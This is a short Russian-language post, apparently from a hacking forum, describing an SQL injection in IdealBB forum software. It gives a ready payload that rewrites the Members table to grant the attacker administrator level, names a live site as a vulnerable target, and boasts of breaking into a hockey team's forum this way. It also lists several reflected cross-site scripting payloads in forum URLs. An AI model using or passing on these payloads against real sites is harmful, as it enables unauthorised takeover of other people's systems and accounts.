И так данная уязвимость была найдена у меня когда разбирал архив на диске, уязвимость заключается в том что отцувствует фильтрация в сообщениях пользователя благодоря которой мы можем выполнить произвольный скюл запрос ( что мы делаем в приведённом примере, а именно становимся администратором) сам запрос: 0';update [dbo].[Members] set [dbo].[Members].[M_Level]=3 where [dbo].[Members].[Member_ID]=3407-- где: [M_Level]=3 -даёт права админа [Member_ID]=3407 - ваш id. пример: до запроса: сам запрос: после: пример уязвимого форума: http://www.lucianopires.com.br/idealbb/default.asp ----------------------------- при помощи данной уязвимости когда то был взломан форум xakep.ru и мной форум хоккейной команды: ньюёрские ренжеры так же на форуме присутствуют и XSS PHP: /topics.aspx?forumID=59%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E /categoryindex.aspx?boardID=1%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E /topics.aspx?date=12/05/2005&boardID= 1%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E /posts.aspx?postID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E /forums.aspx?catID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E /member.aspx?memberID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E /topics.aspx?forumID=54&topicRepeater1-p= %22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
